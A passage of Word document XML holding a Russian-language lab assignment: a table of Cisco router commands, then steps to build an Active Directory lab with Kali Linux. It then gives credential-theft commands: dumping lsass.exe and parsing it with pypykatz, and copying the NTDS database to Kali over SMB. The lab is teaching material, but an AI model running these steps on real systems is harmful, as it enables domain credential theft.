          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Вход/выход в привилегированный режим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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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configure terminal/exit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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Вход/выход в режим глобальной конфигурации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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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Interface Gi&lt;X&gt;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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Переход в режим конфигурации интерфейса. &lt;X&gt; </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> номер интерфейса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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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Line Console 0 /line VTY 0 4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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Переход в режимы конфигурации консольного интерфейса, линий виртуальных терминалов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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Настройка интерфейсов</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx/>
        <w:trPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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IP address x.x.x.x y.y.y.y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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Назначение статического адреса IPv4 на интерфейс маршрутизатора. X.X.X.X </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> IP-адрес интерфейса, Y.Y.Y.Y </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> маска подсети интерфейса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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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IP address DHCP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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Назначение адреса интерфейса по протоколу DHCP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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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Show IP interfaces brief (из режима #)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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Просмотр IP-адресов интерфейсов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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Настройка сервера DHCP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx/>
        <w:trPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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IP DHCP pool &lt;name&gt;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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Создание пула адресов DHCP. &lt;name&gt; </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> название пула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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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Network 10.0.X.0 255.255.255.0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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Создание сети для раздачи DHCP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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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Default-router X.X.X.X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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Определение основного шлюза для раздачи DHCP. X.X.X.X </w:t>
            </w:r>
            <w:r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—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> IP-адрес шлюза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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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DNS-server X.X.X.X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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Определение адреса DNS-сервера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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Настройка SSH</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx/>
        <w:trPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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Hostname &lt;Имя устройства&gt;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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Определение имени устройства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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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IP domain name LabX.com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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Определение имени домена. X-номер варианта.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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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Crypto key generate RSA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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Генерация ключа RSA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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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Transport input SSH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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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В режиме конфигурации VTY. Определение протокола для входящих подключений к маршрутизатору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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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Access-list 5 permit host X.X.X.X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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Лист управления доступом, разрешающий подключение с адреса источника X.X.X.X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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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Access-class 5 in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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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В режиме конфигурации VTY. Применение ACL 5 к подключениям SSH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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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Login local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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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В режиме конфигурации VTY или Console. Проверка логина и пароля с использованием локальной базы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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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b/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Настройка NAT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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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IP NAT inside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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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В режиме конфигурации интерфейса. Определение интерфейса как внутренний (направленный в ЛВС) интерфейс NAT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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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IP NAT outside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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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В режиме конфигурации интерфейса. Определение интерфейса как внешнего (направленного в интернет) интерфейс NAT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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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Access-list 100 permit IP 10.0.X.0 0.0.0.255 any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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Определение ACL для NAT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cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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IP nat inside source list 100 interface Gi2 overload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</w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto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Включение трансляции NAT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</w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:before="220" w:after="200" w:line="335" w:lineRule="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360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Выполнить настройку Active Directory на Windows Server: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eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1133" w:hanging="425"/>
        <w:spacing w:line="259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2.1. опционально. В случае если Windows Server демонстрирует окно о необходимости активации, выполнить команду в CMD с правами администратора slmgr /rearm;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1133" w:hanging="425"/>
        <w:spacing w:line="259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2.2. выполнить настройку Windows Server согласно схеме </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4d5156"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— 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настроить IP-адрес, сетевое имя сервера;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1133" w:hanging="425"/>
        <w:spacing w:line="259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2.3. установить серверную роль Active Directory Domain Services. Использовать параметры по умолчанию;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1133" w:hanging="425"/>
        <w:spacing w:line="259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2.4. установить контроллер домена Active Directory как новый контроллер домена в новом домене. Имя домена </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4d5156"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—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 LabX.com, где X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4d5156"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— 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номер варианта. Функциональный уровень домена или леса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4d5156"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—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 Windows Server 2012. Должна быть выбрана функция Глобального каталога. Остальные настройки по умолчанию. Установить пароли учётной записи администратора домена и режима восстановления. Сохранить установочный скрипт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4d5156"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— 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функция доступна в мастере установки. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Включить скриншот со скриптом в отчёт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0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360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Включить в состав домена клиента Windows 10:</w:t>
      </w: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eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1133" w:hanging="425"/>
        <w:spacing w:line="259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3.1. войти на контроллер домена с учётной записью Администратора. На рабочем столе сервера расположен PS-скрипт, предназначенный для преднастройки каталога. Выполнить адаптацию скрипта под систему имён настроенного домена;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1133" w:hanging="425"/>
        <w:spacing w:line="259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3.2. запустить скрипт. Убедиться, что в оснастке Active Directory Users and Compurers появились новые объекты: OU, пользователи, группы. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Сделать скриншот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 состояния домена в оснастке Active Directory Users and Computers, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">скриншот включить в отчёт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;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1133" w:hanging="425"/>
        <w:spacing w:line="259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3.3. войти в ОС Windows 10 с учётной записью Администратора. Выполнить настройки сетевого имени и IP-адреса согласно схеме;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1133" w:hanging="425"/>
        <w:spacing w:line="259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3.4. ввести Windows 10 в домен, используя учётную запись LabX\ADMpetr.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0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:spacing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Установить Kali Linux, выполнить начальную конфигурацию;</w:t>
      </w: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eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1133" w:hanging="425"/>
        <w:spacing w:line="259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4.1. выполнить загрузку Kali Linux с Live CD. Выполнить начальную конфигурацию Kali Linux согласно схеме. Добавить DNS-сервер 8.8.8.8 в конфигурацию сетевого интерфейса;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1133" w:hanging="425"/>
        <w:spacing w:line="259" w:lineRule="auto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4.2. выполнить команду IP a. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Сделать скриншот состояния интерфейса, включить в отчёт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.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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:spacing w:line="259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Выполнить сохранение дампа памяти процесса lsass.exe, исследование учётных записей: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1133" w:hanging="425"/>
        <w:spacing w:line="259" w:lineRule="auto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5.1. войти в ОС Windows 10 под учётной записью LabX\Maria. Запустить Диспетчер задач с правами администратора. В качестве УЗ администратора использовать LabX\ADMpetr. Создать дамп процесса lsass.exe.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Сохранить файл;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ind w:left="1133" w:hanging="425"/>
        <w:spacing w:line="259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5.2. активировать SSH-сервер на Kali Linux. В терминале Kali выполнить команду sudo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systemctl start ssh;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1133" w:hanging="425"/>
        <w:spacing w:line="259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5.3. передать файл дампа на Kali. В Windows 10 запустить CMD от имени ADMpetr, выполнить команду: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cd &lt;путь к файлу с дампом lsass&gt;. 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Выполнить копирование по SCP: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scp lsass.DMP kali@&lt;адрес kali&gt;:/home/kali. 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На kali проверить наличие дампа процесса;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1133" w:hanging="425"/>
        <w:spacing w:line="259" w:lineRule="auto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5.4. выполнить анализ дампа lsass.dmp на Kali Linux. В терминале убедиться, что фокус установлен на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/home/kali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, выполнить команду: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pypykatz lsa minidump lsas.DMP;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ind w:left="1133" w:hanging="425"/>
        <w:spacing w:line="259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​​5.5.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">сделать скриншот с указанием найденных учётных записей и данных аутентификации. Скриншот включить в отчёт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0" w:firstLine="0"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow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6. Выполнить анализ базы данных ntds с помощью Pypykatz, удалённое выполнение команд:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1133" w:hanging="425"/>
        <w:spacing w:line="259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6.1. войти на контроллер домена под учётной записью администратора домена. Запустить командную строку или сеанс PowerShell с правами администратора. Запустить средство работы с NTDS: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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259" w:lineRule="auto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ntdsutil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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259" w:lineRule="auto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activate instance ntds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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259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запустить репликацию NTDS в папку Temp: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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259" w:lineRule="auto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ifm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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259" w:lineRule="auto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create full c:\Temp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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259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Убедиться в том, что процесс копирования завершился успешно;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1133" w:hanging="425"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259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6.2.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">перейти на Kali Linux, пройти аутентификацию, если необходимо. Выполнить подключение к контроллеру домена по протоколу SMB, для этого в окне терминала выполнить команды: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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259" w:lineRule="auto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Smbclient ‘\\&lt;адрес контроллера домена&gt;\С$’ -U labX/Administrator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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259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Пройти аутентификацию, убедиться, что подключение успешно. Далее выполнить команды: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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259" w:lineRule="auto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Ls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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259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Убедиться, что папки диска C: контроллера домена доступны.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1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259" w:lineRule="auto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Prompt OFF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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259" w:lineRule="auto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Lcd /home/kali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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259" w:lineRule="auto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Mget temp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ind w:left="1133" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:spacing w:line="259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Убедиться, что папки скопированы и доступны в Kali;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1140" w:hanging="435"/>
        <w:jc w:val="both"/>
        <w:spacing w:after="160" w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:color w:val="0563c1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6.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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в случае необходимости, если пакет отсутствует в Kali, выполнить установку пакета impacket, если он не доступен в системе. Следовать руководству</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tooltip="https://blog.eldernode.com/install-and-use-impacket-on-kali-linux/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
